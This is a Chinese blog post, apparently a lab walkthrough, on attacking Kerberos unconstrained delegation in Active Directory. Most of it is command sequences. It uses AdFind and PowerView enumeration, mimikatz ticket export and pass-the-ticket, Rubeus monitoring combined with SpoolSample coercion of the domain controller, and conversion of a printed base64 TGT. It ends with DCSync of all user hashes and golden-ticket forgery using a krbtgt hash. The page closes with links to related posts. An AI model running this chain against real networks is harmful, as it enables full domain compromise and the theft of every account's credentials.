非约束委派攻击

已于 2022-07-25 22:24:24 修改
阅读量608 收藏
点赞数 1
文章标签: 服务器 网络 运维
于 2022-07-24 20:52:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45462249/article/details/125962231
版权

委派:

用户A去访问服务B,服务B的服务账户开启了非约束委派,那么当用户A访问服务B的时候会将用户A的TGT发送给服务B并保存进内存,服务B能够利用用户A的身份去访问用户A能够访问的任意服务

第一种非约束性委派:

在域中只有服务账号和主机账号才有委派属性
主机账号也称机器账号(一个普通域用户默认最多能创建十个主机账号)
服务账号是通过域用户注册SPN变为服务账号

setspn -U -A mysql/fileserver.fbi.gov fileserver

需要查询当前域内的非约束委派用户

AdFind.exe -b "DC=fbi,DC=gov" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

在这里插入图片描述

查找域内非约束委派用户和计算机

查询域中所有非约束委派用户Get-NetUser -Unconstrained -Domain fbi.gov 

查询域中所有非约束委派计算机Get-NetComputer -Unconstrained -Domain fbi.gov

在这里插入图片描述
在这里插入图片描述
使用 dc 或者域管,去登录 fileserver ,可在 fileserver上留存票据凭证,然后需要让域控模拟访问被设置了非约束委派的机器:

Enter-PSSession -ComputerName fileserver

域控模拟访问被设置了约束委派的机器后,这个时候其实域管理员的 TGT 已经缓存在 fileserver 机器上了。打开mimikatz

privilege::debug 
sekurlsa::tickets /export
kerberos::ptt [0;124f863]-2-0-60a10000-Administrator@krbtgt-FBI.GOV.kirbi
misc::cmd
klist

这个时候可以用klist命令查看票据是否导入进去

dir \\dc\c$

第二中方法(非约束性委派+Spooler打印机服务):

Rubeus监听

Rubeus.exe monitor /interval:1 /filteruser:dc$
%%% 用Rubeus来监听Event ID为4624事件,这样可以第一时间截取到域控的TGT
%%%  /interval:1 设置监听间隔1秒
%%% filteruser 监听对象为我们的域控,注意后面有个$,如果不设置监听对象就监听所有的TGT
%%% DC$为域控的主机名字加$

在这里插入图片描述

利用打印服务强制让域控机向本机验证身份
下载spoolsample.exe,此程序运行需要.net4。win7以当前域用户身份运行。注意win7需要关闭防火墙,不然接收不了ticket
SpoolSample.exe dc fileserver
在这里插入图片描述

此时Rubeus已经接收到了TGT
复制监听到的TGT的base64,去空格,下面是去空格的网站

https://uutool.cn/nl-trim-all/

然后直接用powershell转到为正常的TGT即可
[IO.File]::WriteAllBytes(“绝对路径\ticket.kirbi”, [Convert]::FromBase64String(“TGT”))

[IO.File]::WriteAllBytes("dc.kirbi",[Convert]::FromBase64String("doIEujCCBLagAwIBBaEDAgEWooID0zCCA89hggPLMIIDx6ADAgEFoQkbB0ZCSS5HT1aiHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB0ZC
SS5HT1ajggOVMIIDkaADAgESoQMCAQKiggODBIIDf4tq6aABFZ/ANADOwSpeZtVTimkVP9nsvhoe9IDH1nsBPIAZ2+PNYfoSdB9f
er7gO6ADskID6OPSIJJIg+sBwBJdNkXMYfkwq8Pt1PgMhIxfq4XyUfijm65Jf+KUD3KIOeCcvPBs711SHCWyGHLrMBcl7nfvuRuQ
eyW0W6yoUedQeYKFhHSOWsRUDd8q/SJ8XEnthcl0TpQEXYUKiIm5ZL/tfg6WF0JG6jJIjfvdsv0tbys7gvMx0tadD0QXKP4mrpKd
zOyFQ7bBLVkFDYsbjzzy9wPCC73jfYXiFNHPAgmG9cbLa3wqa4zZ9zhTjqd3ZHLn2awAOk84AlCBPsCjvI9PAdHw2QzLhMMSuZZf
gH6B/LsyuOgRZPIbxS2aGr+23L9B6jkjOgExuQpfF/xlYjLrhfBzp/nNJ9ehvR4J8HP6XM+ucCnO1uJuMNT3Ncj0RObUlCKrbA6N
CrDu0BsFPapZZEqTY8lW7mCDeINk5NuXpZqmXhnC+RomhBsdLMUKS4oPlqBbSOwOOYbNIeUvn2vTOQEngvLdtuGe0A7sUEp/Dmka
5pe4fYJEBpcB9XQIMOLo7Wo7sN8Zac5zqYLbHhJz5bmP1GJ9eaE26x9ijdgmBG0znNjBGw53GMkZ8j+HmMElAXt4Kyiin7zyYZKM
36JchH79vWn1NGdxFViWwVAciDfJEVk0c/3j0NiLKIOBXK/3UdgGJ6PM1w3f4F012t8xsfjcce+GZx499b8QUj8PL8dpAjD18H12
y5trfh/CzEiBddsU7HYeU1RZ8Ve5WtGKjUK8bRMLjLYFdFOVHKzhmcOCaE5xCiN+Oirr2AhSjLpnJQWBi4WFl5YskXYpYy10dYNw
MwtveB0ojeLdpYDEoyDigCs191YJwKoz35XNdonICDpUkWncT6gtFvojw9g8Xeu4kN6tRmPSGY3w/wlk/u+BaJdfGCLj8XOEkLRY
rSynaWIDonaARisWy1x/SjdJGSaHKz+/1+3H/KoM9F7CFCenE61L0hPr3nUdno8hlSCy41cTfzP1SDDQSO0JIg5a6m1isIiUNmcQ
9aZHCnhGZZC0IYbJNiVFLlqpLeyEMQmTaYFMyUIVcivnkmhTWq4H6iGms/scuq9uyk3Pywwl6KSsPbSizI0ZEl9KIu7Uh9VeQ2Bi
SBlkdc+KCyQYnguBh+X/i08acxhdhayH4fKjgdIwgc+gAwIBAKKBxwSBxH2BwTCBvqCBuzCBuDCBtaArMCmgAwIBEqEiBCBL34Na
cMCN7myuuGmuIx3MuUs4Pu42KCxU3Avd+iV2EKEJGwdGQkkuR09WohAwDqADAgEBoQcwBRsDREMkowcDBQBgoQAApREYDzIwMjIw
NzIzMDEzMTMxWqYRGA8yMDIyMDcyMzExMzEyN1qnERgPMjAyMjA3MzAwMTMxMjdaqAkbB0ZCSS5HT1apHDAaoAMCAQKhEzARGwZr
cmJ0Z3QbB0ZCSS5HT1Y="))

在这里插入图片描述

注入TGT票据到当前会话并导出域控中所有用户的hash
mimikatz以域用户身份运行

kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:test.lab /all /csv

在这里插入图片描述

这儿请注意,我们这儿获得的TGT票据,不能算黄金票据,因为我们获得的权限只是域控的本地管理权限,所以不能连接域控,但是我们确可以因此获取所以用户的hash,所以能制作真正的黄金票据

制作黄金票据
既然存在krbtgt用户,并且有该用户的hash或者NTML值,可以用它生成黄金票据

  1. 获取本账号的sid

现在本机执行 whoami /user,注意不需要后面表示账号权限的几位数

  1. 制作票据

    kerberos::golden /domain:fbi.gov /sid:S-1-5-21-124841762-3349575232-3850797422-1103 /krbtgt:d19009f38e6b6720109b3fab3fa98090 /user:Administrator /ptt
    在这里插入图片描述

此时已经可以连接域控了
dir \dc\c$

成长中的小菜菜
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rubeus+spoolsample.zip域渗透约束委派攻击实验
08-19
域渗透中约束性而委派攻击实验所用到的工具已经编译好了,直接食用
【域权限维持】-约束委派&约束委派
qq_41617902的博客
02-14 444
域的约束委派&约束委派利用
约束委派攻击原理与利用
yy
04-07 5080
在实际情况中,往往多个服务不可能都在一台机器中,那么如果用户在使用服务A时,又需要用到服务B上的数据,那么最简单的方式就是A代替用户去请求B并返回相应的数据,这个过程就是委派。即 委派=我帮你去做什么事委派攻击分为约束委派约束委派、基于资源的约束委派三种。
Kerberos-约束委派攻击
m0_75218183的博客
06-07 346
概念: 服务账号可以获取被委派用户的TGT,并将TGT缓存到lsass进程中,从而服务账号可使用该TGT,模拟该用户访问域内其他服务。约束委派的设置需要SeEnableDelegationPrivilege权限,该特权通常只有域管理员才有。
域渗透之约束委派
qq_56426046的博客
11-12 709
一个域内普通用户jack通过Kerberos协议认证到前台WEB服务后,前台运行 WEB服务的服务账号websvc模拟(Impersonate)用户 jack,以Kerberos 协议继续认证到后台服务器,从而在后台服务器中获取jack用户的访问权限,即域中单跳或者多跳的Kerberos认证。KDC检查websvc的委派属性,如果被设置,且申请的文件服务在允许的列表清单中,则返回一个jack用户访问文件服务的授权票据 ST;websvc收到的jack用户的授权票据ST后,可访问文件服务,完成多跳认证。
域控-笔记三(约束委派攻击约束委派攻击
5L2g556F5ZWl77yf
11-25 2337
文章目录一. 域委派1.1 域委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 约束委派攻击本地环境约束委派的查找 一. 域委派 1.1 域委派分类 约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
rbcd-attack:使用Impacket从外部进行基于Kerberos资源的约束委派攻击
04-01
此存储库是针对Windows Active Directory域中针对Kerberos资源的约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是从加入域的计算机(通常是Windows)发起的...
Linux使用Sudo委派权限
09-15
今天小编就为大家分享一篇关于Linux使用Sudo委派权限的文章,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
事件委派功能zsbd
08-18
事件委派功能,点击父类中子类每个元素都是触发事件,节省内存
java设计模式之委派模式原理分析
08-25
主要介绍了java设计模式之委派模式原理分析,文中通过示例代码介绍的常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
【内网安全】横向移动&约束委派&约束委派&资源约束委派&数据库攻防
今天是几号的博客
04-05 1091
由于约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,总的来说,如果需要在Windows环境中使用委派功能,建议使用约束委派而不是约束委派,以提高系统和数据的安全性。攻击者拿到了一台配置约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。机器A(域控)访问具有约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,
约束委派利用
qq_18811919的博客
02-21 279
讲解了约束委派的相关配置以及多种利用方式,委派攻击是域渗透当中常见的攻击手法。
域渗透委派攻击约束委派
Longwaer
01-22 925
学习域内委派攻击约束委派,了解委派原理,更好的开展内网工作。
Kerberos 域委派攻击约束委派
Adminxe的博客
03-06 822
CSDN文章自动迁移自博客在Windows 2000 Server 首次发布 Active Directory 时,Microsoft 必须提供一种简单的机制来支持用户通过 Kerberos 向 Web Server 进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为“Kerberos 双跳问题”,并且要求进行委派,以便 Web Server 在修改数据库记录时模拟用户。Windows 2000 Server 发布的也是最初的约束委派。需要注意的一点是接受委派的用户只能是。
Rubeus使用
qq_18811919的博客
02-26 2092
Rubeus使用讲解了TGT|TGS票据的申请,AS-REP Roasting与Kerberoasting和委派相关用法
域渗透约束委派&Spooler
Longwaer
01-23 1078
学习掌握内网域渗透委派攻击约束委派,加上联合Spooler打印机的漏洞更好的了解漏洞原理。
域渗透之AS-REP Roasting
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 540
攻击者可以使用指定的用户去请求票据,向域控制器发送AS_REQ请求,此时域控会不作任何验证便将 TGT 票据和加密的 Session-key 等信息返回。因此攻击者就可以对获取到的加密 Session-key 进行离线破解,如果爆破成功,就能得到该指定用户的明文密码。
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY约束委派约束委派基于资源的约束委派基于委派攻击约束委派攻击约束委派攻击基于资源的约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
linuxdns委派
最新发布
02-01
Linux DNS委派是指在Linux操作系统中配置和管理域名系统(DNS)的委派过程。DNS委派是将特定的域名区域的管理权交给其他DNS服务器的过程。 在Linux中,DNS委派通常涉及到配置主DNS服务器和从DNS服务器。主DNS服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值